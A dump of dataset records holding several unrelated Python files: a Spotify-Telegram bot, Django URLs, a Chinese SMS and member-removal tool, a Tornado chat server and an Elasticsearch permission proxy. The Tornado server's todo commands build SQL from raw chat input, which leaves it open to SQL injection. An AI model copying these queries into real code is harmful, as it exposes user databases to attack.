+{"seq_id": "275856281", "text": "from uuid import uuid4\nfrom pony import orm\nfrom telegram import (\n ParseMode,\n InlineQueryResultArticle,\n InputTextMessageContent,\n InlineKeyboardMarkup,\n InlineKeyboardButton,\n)\nfrom telegram.utils.helpers import escape_markdown\nfrom datetime import datetime\n\nfrom models import User\nfrom spotify_client import spt, get_credentials\nfrom utils import bot_description\n\n\ndef help(update, context):\n \"\"\"Send a message when the command /help is issued.\"\"\"\n update.message.reply_text(bot_description)\n\n\n@orm.db_session\ndef start(update, context):\n \"\"\"Send a message when the command /start is issued.\"\"\"\n if spt.is_oauth_ready:\n user_id = str(update.message.from_user.id)\n url = spt.auth_uri(state=user_id)\n update.message.reply_text(\n \"Tap the button below to log in with your Spotify account\",\n reply_markup=InlineKeyboardMarkup(\n inline_keyboard=[[InlineKeyboardButton(text=\"Login\", url=url)]]\n ),\n )\n else:\n print(\"There's something wrong\")\n update.message.reply_text(\"There's something wrong\")\n\n\n@orm.db_session\ndef inlinequery(update, context):\n \"\"\"Handle the inline query.\"\"\"\n user_id = update.inline_query.from_user.id\n users = orm.select(u for u in User if u.telegram_id == user_id)[:]\n if users:\n user = users[0]\n else:\n update.inline_query.answer(\n [],\n switch_pm_text=\"Login to Spotify\",\n switch_pm_parameter=\"spotify_log_in\",\n cache_time=0,\n )\n return 0\n\n user_creds = get_credentials(user)\n\n spoti = spt\n spoti.user_creds = user_creds\n\n current_status = spoti.currently_playing() # [\"item\"]\n if current_status:\n song = spoti.currently_playing()[\"item\"]\n else: # no songs currently playing\n song = spoti.recently_played_tracks(limit=1)[\"items\"][0][\n \"track\"\n ] # get the last played song\n print(\n \"{} | {} - {}\".format(datetime.now(), song[\"artists\"][0][\"name\"], song[\"name\"])\n )\n song_title = song[\"name\"]\n song_artist = song[\"artists\"][0][\"name\"]\n song_url = song[\"external_urls\"][\"spotify\"]\n thumb = song[\"album\"][\"images\"][-1]\n results = [\n InlineQueryResultArticle(\n id=uuid4(),\n title=\"{} - {}\".format(song_artist, song_title),\n url=song_url,\n thumb_url=thumb[\"url\"],\n thumb_width=thumb[\"width\"],\n thumb_height=thumb[\"height\"],\n input_message_content=InputTextMessageContent(\n \"🎵 [{}]({}) by {}\".format(\n escape_markdown(song_title), song_url, escape_markdown(song_artist)\n ),\n parse_mode=ParseMode.MARKDOWN,\n ),\n reply_markup=InlineKeyboardMarkup(\n inline_keyboard=[\n [InlineKeyboardButton(text=\"Listen on Spotify\", url=song_url)]\n ]\n ),\n )\n ]\n\n update.inline_query.answer(results, cache_time=0)\n\n\ndef error(update, context):\n \"\"\"Log Errors caused by Updates.\"\"\"\n print('Update \"%s\" caused error \"%s\"', update, context.error)\n", "sub_path": "bot_callbacks.py", "file_name": "bot_callbacks.py", "file_ext": "py", "file_size_in_byte": 3182, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "utils.bot_description", "line_number": 20, "usage_type": "argument"}, {"api_name": "spotify_client.spt.is_oauth_ready", "line_number": 26, "usage_type": "attribute"}, {"api_name": "spotify_client.spt", "line_number": 26, "usage_type": "name"}, {"api_name": "spotify_client.spt.auth_uri", "line_number": 28, "usage_type": "call"}, {"api_name": "spotify_client.spt", "line_number": 28, "usage_type": "name"}, {"api_name": "telegram.InlineKeyboardMarkup", 
"line_number": 31, "usage_type": "call"}, {"api_name": "telegram.InlineKeyboardButton", "line_number": 32, "usage_type": "call"}, {"api_name": "pony.orm.db_session", "line_number": 23, "usage_type": "attribute"}, {"api_name": "pony.orm", "line_number": 23, "usage_type": "name"}, {"api_name": "pony.orm.select", "line_number": 44, "usage_type": "call"}, {"api_name": "pony.orm", "line_number": 44, "usage_type": "name"}, {"api_name": "models.User", "line_number": 44, "usage_type": "name"}, {"api_name": "spotify_client.get_credentials", "line_number": 56, "usage_type": "call"}, {"api_name": "spotify_client.spt", "line_number": 58, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 69, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 69, "usage_type": "name"}, {"api_name": "telegram.InlineQueryResultArticle", "line_number": 76, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 77, "usage_type": "call"}, {"api_name": "telegram.InputTextMessageContent", "line_number": 83, "usage_type": "call"}, {"api_name": "telegram.utils.helpers.escape_markdown", "line_number": 85, "usage_type": "call"}, {"api_name": "telegram.ParseMode.MARKDOWN", "line_number": 87, "usage_type": "attribute"}, {"api_name": "telegram.ParseMode", "line_number": 87, "usage_type": "name"}, {"api_name": "telegram.InlineKeyboardMarkup", "line_number": 89, "usage_type": "call"}, {"api_name": "telegram.InlineKeyboardButton", "line_number": 91, "usage_type": "call"}, {"api_name": "pony.orm.db_session", "line_number": 40, "usage_type": "attribute"}, {"api_name": "pony.orm", "line_number": 40, "usage_type": "name"}]} +{"seq_id": "23242111", "text": "from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n url(r'(?P\\d+)/(?P\\d+)/$',views.step_detail,\n name='step'),\n url(r'^$', views.guide_list, name='list'),\n url(r'(?P\\d+)/$', views.guide_detail, name='detail'),\n]", "sub_path": "rdp/guides/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 269, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.conf.urls.url", "line_number": 6, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}]} +{"seq_id": "117673777", "text": "# -*- coding: utf-8 -*-\nimport logging\nimport os\nimport random\nfrom xml.etree import ElementTree\n\nfrom common import Checker, HOME\nfrom conf import TemplateParser\nfrom shanbay.util import open_file, console, ask\n\n\nclass MsgTool(Checker):\n def __init__(self):\n Checker.__init__(self)\n self.START_PROMPT = '========================= 短信工具开始 ========================='\n self.END_PROMPT = '========================= 短信工具结束 ========================='\n self.DIR = os.path.join(HOME, 'data/msg_tool/%s' % self.TODAY_STR)\n self.LOG = os.path.join(self.DIR, '%s_msg_tool.txt' % self.TODAY_STR)\n self.MAKO = os.path.abspath(os.path.join(HOME, 'bin/etc/msg_tool.mako'))\n\n self.input_txt = os.path.abspath(os.path.join(HOME, 'user/input.txt'))\n self.xml = os.path.abspath(os.path.join(HOME, 'user/msg_tool.xml'))\n self.mode = 1\n\n # “踢人并发送短信”模式用\n self.statistic = {}\n self.email_content = ''\n self.HTML = os.path.abspath(os.path.join(self.DIR, '%s_msg_tool.html' % self.NOW_STR))\n self.EMAIL_SUBJECT = '【兰芷馥郁】管理踢人报表'\n\n def main(self):\n # noinspection PyBroadException\n try:\n self.set_logger()\n self.login_prepare()\n 
self.select_mode()\n if self.mode == 1:\n self.send_all_process()\n elif self.mode == 2:\n self.send_part_process()\n elif self.mode == 3:\n self.dispel_with_msg()\n except Exception as e:\n logging.exception(e)\n self.quit()\n\n def login_prepare(self):\n # 在载入模板前进行一些初始化工作\n # 检查xml存在性,若不存在从data目录复制\n if not os.path.exists(self.xml):\n import shutil\n shutil.copy(os.path.abspath(os.path.join(HOME, 'data', 'msg_tool.xml')), self.xml)\n # 检查txt存在性,若不存在新建个,若存在则清空\n with open(self.input_txt, 'w'):\n pass\n # 显示开始,加载模板\n console(self.START_PROMPT)\n self.load_templates()\n\n def load_templates(self):\n \"\"\"\n 加载短信模板\n \"\"\"\n if self.xml:\n try:\n if isinstance(self.xml, str):\n self.templates = TemplateParser(self.xml)\n elif isinstance(self.xml, (list, tuple)):\n self.templates = TemplateParser(*self.xml)\n # 若解析失败,给出友好提示\n except ElementTree.ParseError:\n msg = '''msg_tool.xml解析失败!请检查如下:\n1、短信的标题和内容是否含有<或&\n2、XML的结构是否正确\n对于1,请按如下规则进行替换或不使用这些字符:\n<替换为&lt; &替换为&amp;\n对于2,请参考data目录下的XML结构'''\n console(msg)\n self.quit()\n\n def select_mode(self):\n modes = [\n '发送全员通知',\n '指定用户ID群发',\n '踢人并发送短信',\n ]\n for i, m in enumerate(modes):\n console('%d -> %s' % (i + 1, m))\n ans = ask('请选择:', [1, 2, 3], '输入有误,请重新输入!')\n self.mode = int(ans)\n\n def get_members(self):\n for mbr in self.get_rest_members():\n self.members[mbr.user_id] = mbr\n print()\n\n def send_all_process(self):\n def preview(mid):\n # 重新载入短信模板并向自己发短信预览\n self.load_templates()\n self.members[mid]['remark'] = ['all']\n self.send_msgs('all')\n console('已向自己发送短信,请打开扇贝进行预览。')\n del self.members[mid]['remark']\n\n # 检查短信模板中是否存在all标记\n if not hasattr(self.templates, 'all'):\n console('短信模板中无all标记!')\n return False\n # 获取所有成员\n self.login_process()\n self.get_members()\n # 向自己发短信进行预览\n my_uid = __class__.my_info().user_id\n preview(my_uid)\n while True:\n yrn = ask('接下来,y-继续(默认),r-重新载入短信模板,n-取消。请选择:', '[yYrRnN]|', '无此选项')\n if yrn.lower() in ('y', 'n', ''):\n break\n else:\n preview(my_uid)\n if yrn.lower() == 'n':\n return False\n # 验证码确认\n vn = '%04d' % random.randint(0, 9999)\n ask('请输入验证码(%s)以确认本次操作:' % vn, vn, '验证码输入错误!')\n # 添加标记并发送短信\n for uid, mbr in self.members.items():\n mbr['remark'] = ['all']\n self.send_msgs('all')\n\n def input_prepare(self, uids):\n def load_input(ids):\n _flag = True\n for _id in open(self.input_txt):\n _id = _id.strip()\n if _id:\n _id = int(_id)\n if _id not in list(self.members.keys()):\n _flag = False\n console('用户ID %-10s 不存在,请检查!(注意是用户ID,不是踢人ID或用户名)' % _id)\n else:\n ids.append(_id)\n return _flag\n\n # 清空input.txt\n with open(self.input_txt, 'w'):\n pass\n # 使用默认程序打开txt\n open_file(self.input_txt)\n # 确认以继续\n input('请将用户ID复制至input.txt,每行一个,保存。在此处按Enter继续:')\n # 对用户ID进行检查\n while True:\n uids.clear()\n fg = load_input(uids)\n if not fg:\n input('input.txt中存在错误用户ID,请检查并修改。确认无误后在此处按Enter继续:')\n continue\n if not uids:\n input('input.txt没有数据,是不是没有保存?请保存后在此处按Enter继续:')\n continue\n if fg and uids:\n break\n\n def send_remark_msg(self, uids):\n # 选择短信模板\n self.load_templates()\n rks = []\n for r in self.templates:\n rk = getattr(self.templates, r)\n rks.append(rk)\n console('%d. 
%-20s| %s' %\n (len(rks), rk.name, rk.attr.get('description') if 'description' in rk.attr else ''))\n # fix #50 选择发送的短信模板时,可以选择不发送\n ans = ask('请输入编号以选择短信模板(n-取消/不发送,r-重新选择短信模板):', '\\d+|[nNrR]', '无效选择')\n if ans in ('r', 'R'):\n return self.send_remark_msg(uids)\n if ans in ('n', 'N'):\n return False\n idx = int(ans) - 1\n # 预览模板并确认发送\n console('-------------------- 模板预览 --------------------')\n if not rks[idx]:\n console('未发现可用的短信模板!')\n return False\n mt = rks[idx].tmpl[0]\n # 预览第一个\n mt.para = self.members[uids[0]]\n console(mt.subject)\n console(mt.body)\n yn = ask('将要给 %d 人发送短信,y-确认(默认),n-取消/不发送,r-重新选择短信模板:' % len(uids), '[yYnNrR]|', '无效选项')\n if yn.lower() in ('', 'y'):\n # 添加标记\n for uid in uids:\n self.members[uid]['remark'] = [rks[idx].name]\n self.send_msgs(rks[idx].name)\n # 清理标记\n for uid in uids:\n del self.members[uid]['remark']\n elif yn.lower() == 'r':\n return self.send_remark_msg(uids)\n\n def send_part_sub(self):\n uids = []\n self.input_prepare(uids)\n self.send_remark_msg(uids)\n\n def send_part_process(self):\n # 获取所有成员\n self.login_process()\n self.get_members()\n self.send_part_sub()\n while ask('接下来,y-重复以上流程,n-取消(默认):', '[yYnN]|').lower() == 'y':\n self.send_part_sub()\n\n def show_dispel(self, uids):\n console('************************ 待踢成员列表 ************************')\n console(' 用户ID 贡献值 组龄 贡献率 昵称')\n console('----------------------------------------------------------------')\n for uid in uids:\n mbr = self.members[uid]\n console('{user_id:<10} {points:<5} {days:<4} {point_rate:<5} {nickname}'.format(**mbr))\n\n def dispel_with_msg(self):\n # 获取所有成员\n self.login_process()\n self.get_members()\n uids = []\n self.input_prepare(uids)\n # 显示待踢成员详情\n self.show_dispel(uids)\n # 验证码确认\n vn = '%04d' % random.randint(0, 9999)\n ask('共 %d 人,请输入验证码(%s)以确认踢出:' % (len(uids), vn), vn, '验证码输入错误!')\n # 踢出\n self.dispel = uids\n self.dispel_process()\n # 发送短信\n self.xml = [os.path.abspath(os.path.join(HOME, 'bin/etc/plan_check.xml')),\n os.path.abspath(os.path.join(HOME, 'user/msg_tool.xml'))]\n self.load_templates()\n self.send_remark_msg(uids)\n # 发送邮件\n self.render_html()\n self.send_email()\n\n\nif __name__ == '__main__':\n MsgTool().main()\n", "sub_path": "bin/msg_tool.py", "file_name": "msg_tool.py", "file_ext": "py", "file_size_in_byte": 9597, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "common.Checker", "line_number": 12, "usage_type": "name"}, {"api_name": "common.Checker.__init__", "line_number": 14, "usage_type": "call"}, {"api_name": "common.Checker", "line_number": 14, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 17, "usage_type": "call"}, {"api_name": "common.HOME", "line_number": 17, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 19, "usage_type": "call"}, {"api_name": "common.HOME", "line_number": 19, "usage_type": "argument"}, {"api_name": "os.path.abspath", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "common.HOME", "line_number": 21, 
"usage_type": "argument"}, {"api_name": "os.path.abspath", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 22, "usage_type": "call"}, {"api_name": "common.HOME", "line_number": 22, "usage_type": "argument"}, {"api_name": "os.path.abspath", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "logging.exception", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "shutil.copy", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path", "line_number": 52, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 52, "usage_type": "call"}, {"api_name": "common.HOME", "line_number": 52, "usage_type": "argument"}, {"api_name": "shanbay.util.console", "line_number": 57, "usage_type": "call"}, {"api_name": "conf.TemplateParser", "line_number": 67, "usage_type": "call"}, {"api_name": "conf.TemplateParser", "line_number": 69, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree.ParseError", "line_number": 71, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree", "line_number": 71, "usage_type": "name"}, {"api_name": "shanbay.util.console", "line_number": 78, "usage_type": "call"}, {"api_name": "shanbay.util.console", "line_number": 88, "usage_type": "call"}, {"api_name": "shanbay.util.ask", "line_number": 89, "usage_type": "call"}, {"api_name": "shanbay.util.console", "line_number": 103, "usage_type": "call"}, {"api_name": "shanbay.util.console", "line_number": 108, "usage_type": "call"}, {"api_name": "shanbay.util.ask", "line_number": 117, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 125, "usage_type": "call"}, {"api_name": "shanbay.util.ask", "line_number": 126, "usage_type": "call"}, {"api_name": "shanbay.util.console", "line_number": 141, "usage_type": "call"}, {"api_name": "shanbay.util.open_file", "line_number": 150, "usage_type": "call"}, {"api_name": "shanbay.util.console", "line_number": 173, "usage_type": "call"}, {"api_name": "shanbay.util.ask", "line_number": 176, "usage_type": "call"}, {"api_name": "shanbay.util.console", "line_number": 183, "usage_type": "call"}, {"api_name": "shanbay.util.console", "line_number": 185, "usage_type": "call"}, {"api_name": "shanbay.util.console", "line_number": 190, "usage_type": "call"}, {"api_name": "shanbay.util.console", "line_number": 191, "usage_type": "call"}, {"api_name": "shanbay.util.ask", "line_number": 192, "usage_type": "call"}, {"api_name": "shanbay.util.ask", "line_number": 214, "usage_type": "call"}, {"api_name": "shanbay.util.console", "line_number": 218, "usage_type": "call"}, {"api_name": "shanbay.util.console", "line_number": 219, "usage_type": "call"}, {"api_name": "shanbay.util.console", "line_number": 220, "usage_type": "call"}, {"api_name": "shanbay.util.console", "line_number": 223, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 234, "usage_type": "call"}, {"api_name": "shanbay.util.ask", "line_number": 235, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 240, "usage_type": "call"}, {"api_name": "os.path", "line_number": 240, "usage_type": "attribute"}, 
{"api_name": "os.path.join", "line_number": 240, "usage_type": "call"}, {"api_name": "common.HOME", "line_number": 240, "usage_type": "argument"}, {"api_name": "os.path.abspath", "line_number": 241, "usage_type": "call"}, {"api_name": "os.path", "line_number": 241, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 241, "usage_type": "call"}, {"api_name": "common.HOME", "line_number": 241, "usage_type": "argument"}]} +{"seq_id": "260850306", "text": "import json\nimport time\nimport tornado.ioloop\nimport tornado.web\nimport tornado.websocket\nfrom bot import *\nfrom tornado.ioloop import PeriodicCallback\nfrom tornado.options import define, options, parse_command_line\nimport urllib.parse\nimport psycopg2\nimport os\nimport re\nis_zero = False\n\nclient = set()\n\nurllib.parse.uses_netloc.append(\"postgres\")\nurl = urllib.parse.urlparse(os.environ[\"DATABASE_URL\"])\nconnector = psycopg2.connect(\n database=url.path[1:],\n user=url.username,\n password=url.password,\n host=url.hostname,\n port=url.port\n)\ncur = connector.cursor()\nZERO = ord(\"0\")\nNINE = ord(\"9\")\ndefine(\"port\", default = 8080, help = \"run on the given port\", type = int)\n\nclass IndexHandler(tornado.web.RequestHandler):\n @tornado.web.asynchronous\n def get(self):\n self.render(\"index.html\")\n\nclass SendWebSocket(tornado.websocket.WebSocketHandler):\n def open(self):\n client.add(self)\n print(\"WebSocket opened\") \n\n def on_message(self, message):\n global is_zero\n receive = \"\"\n data = {}\n data['data'] = message\n print(data)\n [ws.write_message(json.dumps(data)) for ws in client]\n if message.startswith(\"bot\"):\n commands = message.split()\n if len(commands) == 2:\n if commands[1] == \"ping\":\n data['data'] = \"pong\"\n [ws.write_message(json.dumps(data)) for ws in client]\n command = {}\n if len(commands) == 3:\n if commands[1] == \"todo\" and commands[2] == \"list\":\n cur.execute(\"select name, content from todo\")\n result = cur.fetchall()\n if len(result)==0:\n receive = \"todo empty\"\n else:\n receive = \"\\n\".join([n+\" \"+c for n, c in [row for row in result]])\n data['data'] = receive\n [ws.write_message(json.dumps(data)) for ws in client]\n elif commands[1] != \"calc\":\n command['command'] = commands[1]\n command['data'] = commands[2]\n bot = Bot(command)\n bot.generate_hash()\n data['data'] = bot.hash\n [ws.write_message(json.dumps(data)) for ws in client]\n if len(commands) >= 3:\n if commands[1] == \"calc\":\n data['data'] = calc(\"\".join(commands[2:]))\n if is_zero:\n data['data'] = \"ERROR: division by zero\"\n [ws.write_message(json.dumps(data)) for ws in client]\n is_zero = False\n if len(commands) == 4:\n if commands[1] == \"todo\" and commands[2] == \"delete\":\n cur.execute(\"delete from todo where name='%s'\" % commands[3])\n connector.commit()\n status, num = cur.statusmessage.split()\n if status == \"DELETE\" and int(num) > 0:\n data['data'] = \"todo deleted\"\n [ws.write_message(json.dumps(data)) for ws in client]\n if len(commands) >= 5:\n if commands[1] == \"todo\" and commands[2] == \"add\":\n cur.execute(\"insert into todo values('%s','%s')\" % (commands[3], \" \".join(commands[4:])))\n connector.commit()\n status, num1, num2 = cur.statusmessage.split()\n if status == \"INSERT\" and int(num2) > 0:\n data['data'] = \"todo added\"\n [ws.write_message(json.dumps(data)) for ws in client]\n\n def on_close(self):\n client.remove(self)\n print(\"WebSocket closed\")\n\napp = tornado.web.Application([\n (r\"/index\", IndexHandler),\n (r\"/\", 
SendWebSocket),\n],\ntemplate_path=os.path.join(os.getcwd(), \"templates\"),\nstatic_path=os.path.join(os.getcwd(), \"static\"),\n)\n\ndef paren(st):\n if st[0] == \"(\":\n ans, idx = first(st[1:])\n return ans, idx+2\n elif ZERO <= ord(st[0]) <= NINE:\n i = 1\n while i < len(st) and ZERO <= ord(st[i]) <= NINE:\n i += 1\n return int(st[:i]), i\n return 0, 0\n\ndef second(st):\n global is_zero\n ans, idx = paren(st)\n\n i = idx\n while i < len(st):\n if st[i] == \"*\":\n tmp, idx = paren(st[i+1:])\n ans *= tmp\n i += idx+1\n elif st[i] == \"/\":\n tmp, idx = paren(st[i+1:])\n if tmp == 0:\n is_zero = True\n else:\n ans /= tmp\n i += idx+1\n elif st[i] == \"%\":\n tmp, idx = paren(st[i+1:])\n if tmp == 0:\n is_zero = True\n else:\n ans %= tmp\n i += idx+1\n elif st[i] == \"^\":\n tmp, idx = paren(st[i+1:])\n ans = pow(ans,tmp)\n i += idx+1\n else:\n return ans, i\n return ans, i\n\ndef first(st):\n ans, idx = second(st)\n\n i = idx\n while i < len(st):\n if st[i] == \"+\":\n tmp, idx = second(st[i+1:])\n ans += tmp\n i += idx+1\n elif st[i] == \"-\":\n tmp, idx = second(st[i+1:])\n ans -= tmp\n i += idx+1\n else:\n return ans, i\n return ans, i\n \ndef calc(s):\n if s.count(\"(\") != s.count(\")\") or re.search(\"[^\\+\\-\\*\\/()0-9^%]\", s):\n return \"ERROR\"\n else:\n return first(s)[0]\n\n\nif __name__ == \"__main__\":\n parse_command_line()\n port = int(os.environ.get(\"PORT\", 5000))\n print(\"Listen :%d\" % port)\n app.listen(port)\n tornado.ioloop.IOLoop.instance().start()", "sub_path": "server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 5703, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "urllib.parse.parse.uses_netloc.append", "line_number": 17, "usage_type": "call"}, {"api_name": "urllib.parse.parse", "line_number": 17, "usage_type": "attribute"}, {"api_name": "urllib.parse", "line_number": 17, "usage_type": "name"}, {"api_name": "urllib.parse.parse.urlparse", "line_number": 18, "usage_type": "call"}, {"api_name": "urllib.parse.parse", "line_number": 18, "usage_type": "attribute"}, {"api_name": "urllib.parse", "line_number": 18, "usage_type": "name"}, {"api_name": "os.environ", "line_number": 18, "usage_type": "attribute"}, {"api_name": "psycopg2.connect", "line_number": 19, "usage_type": "call"}, {"api_name": "tornado.options.define", "line_number": 29, "usage_type": "call"}, {"api_name": "tornado.ioloop.web", "line_number": 31, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", "line_number": 31, "usage_type": "name"}, {"api_name": "tornado.ioloop.web", "line_number": 32, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", "line_number": 32, "usage_type": "name"}, {"api_name": "tornado.ioloop.websocket", "line_number": 36, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", "line_number": 36, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 47, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 53, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 64, "usage_type": "call"}, {"api_name": "bot.generate_hash", "line_number": 69, "usage_type": "call"}, {"api_name": "bot.hash", "line_number": 70, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 71, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 77, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 86, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 94, "usage_type": "call"}, {"api_name": 
"tornado.ioloop.web.Application", "line_number": 100, "usage_type": "call"}, {"api_name": "tornado.ioloop.web", "line_number": 100, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", "line_number": 100, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 104, "usage_type": "call"}, {"api_name": "os.path", "line_number": 104, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 104, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 105, "usage_type": "call"}, {"api_name": "os.path", "line_number": 105, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 105, "usage_type": "call"}, {"api_name": "re.search", "line_number": 169, "usage_type": "call"}, {"api_name": "tornado.options.parse_command_line", "line_number": 176, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 177, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 177, "usage_type": "attribute"}, {"api_name": "tornado.ioloop.ioloop.IOLoop.instance", "line_number": 180, "usage_type": "call"}, {"api_name": "tornado.ioloop.ioloop", "line_number": 180, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", "line_number": 180, "usage_type": "name"}]} +{"seq_id": "234827242", "text": "__author__ = 'schlitzer'\n\nfrom bottle import request\nimport requests\n\nfrom el_aap.app import app, str_index, endpoint\nfrom el_aap_api.errors import *\n\n\n@app.put('/_template')\n@app.put('/_warmer')\ndef admin_put(m_aa):\n m_aa.require_permission(':', '')\n r = requests.put(\n url=endpoint.endpoint+request.path,\n params=request.query,\n data=request.body\n )\n response.status = r.status_code\n response.set_header('charset', 'UTF8')\n return r.json()\n\n\n@app.put(str_index+'/_warmer')\n@app.put(str_index+'/<_type>/_warmer')\n@app.put(str_index)\n@app.put(str_index+'/')\n@app.put(str_index+'/_mapping/<_type>')\n@app.put(str_index+'/_settings')\ndef put(m_aa, _index, _type=None):\n m_aa.require_permission(':index:manage:', _index)\n r = requests.put(\n url=endpoint.endpoint+request.path,\n params=request.query,\n data=request.body\n )\n response.status = r.status_code\n response.set_header('charset', 'UTF8')\n return r.json()\n\n\n@app.post('/_flush')\n@app.post('/_forcemerge')\n@app.post('/_optimize')\n@app.post('/_refresh')\n@app.post('/_cache/clear')\ndef post(m_aa):\n m_aa.require_permission(':', '')\n r = requests.post(\n url=endpoint.endpoint+request.path,\n params=request.query,\n data=request.body\n )\n response.status = r.status_code\n response.set_header('charset', 'UTF8')\n return r.json()\n\n\n@app.post(str_index+'')\n@app.post(str_index+'/')\n@app.post(str_index+'/_cache/clear')\n@app.post(str_index+'/_flush')\n@app.post(str_index+'/_refresh')\n@app.post(str_index+'/_optimize')\n@app.post(str_index+'/_upgrade')\n@app.post(str_index+'/_close')\n@app.post(str_index+'/_open')\n@app.post(str_index+'/_forcemerge')\ndef post(m_aa, _index):\n m_aa.require_permission(':index:manage:', _index)\n r = requests.post(\n url=endpoint.endpoint+request.path,\n params=request.query,\n data=request.body\n )\n response.status = r.status_code\n response.set_header('charset', 'UTF8')\n return r.json()\n\n\n@app.delete(str_index+'')\n@app.delete(str_index+'/')\ndef delete(m_aa, _index):\n for index in _index.split(','):\n m_aa.require_permission(':index:manage:', index)\n r = requests.delete(\n url=endpoint.endpoint+request.path,\n params=request.query,\n data=request.body\n )\n response.status = r.status_code\n response.set_header('charset', 'UTF8')\n 
return r.json()\n\n\n@app.get('/_analyze')\n@app.get('/_mapping')\n@app.get('/_segments')\n@app.get('/_recovery')\n@app.get('/_shard_stores')\n@app.get('/_stats')\n@app.get('/_stats/')\n@app.get('/_stats/')\n@app.get('/_template/')\n@app.get('/_all/_mapping')\n@app.get('/_all/_settings')\n@app.get('/_all/_settings/')\n@app.get(str_index+'/_mapping')\n@app.get(str_index+'/_mapping/')\n@app.get(str_index+'/')\n@app.get(str_index+'/_settings')\n@app.get(str_index+'/_settings/)')\ndef info(m_aa, _index, dummy=None):\n for index in _index.split(','):\n m_aa.require_permission(':index:manage:monitor', index)\n r = requests.get(\n url=endpoint.endpoint+request.path,\n params=request.query,\n )\n response.status = r.status_code\n response.set_header('charset', 'UTF8')\n return r.json()\n\n\n", "sub_path": "el_aap/controllers/index_api.py", "file_name": "index_api.py", "file_ext": "py", "file_size_in_byte": 3958, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "requests.put", "line_number": 14, "usage_type": "call"}, {"api_name": "el_aap.app.endpoint.endpoint", "line_number": 15, "usage_type": "attribute"}, {"api_name": "el_aap.app.endpoint", "line_number": 15, "usage_type": "name"}, {"api_name": "bottle.request.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 15, "usage_type": "name"}, {"api_name": "bottle.request.query", "line_number": 16, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 16, "usage_type": "name"}, {"api_name": "bottle.request.body", "line_number": 17, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 17, "usage_type": "name"}, {"api_name": "el_aap.app.app.put", "line_number": 10, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 10, "usage_type": "name"}, {"api_name": "el_aap.app.app.put", "line_number": 11, "usage_type": "call"}, {"api_name": "el_aap.app.app", "line_number": 11, "usage_type": "name"}, {"api_name": "requests.put", "line_number": 32, "usage_type": "call"}, {"api_name": "el_aap.app.endpoint.endpoint", "line_number": 33, "usage_type": "attribute"}, {"api_name": "el_aap.app.endpoint", "line_number": 33, "usage_type": "name"}, {"api_name": "bottle.request.path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 33, "usage_type": "name"}, {"api_name": "bottle.request.query", "line_number": 34, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 34, "usage_type": "name"}, {"api_name": "bottle.request.body", "line_number": 35, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 35, 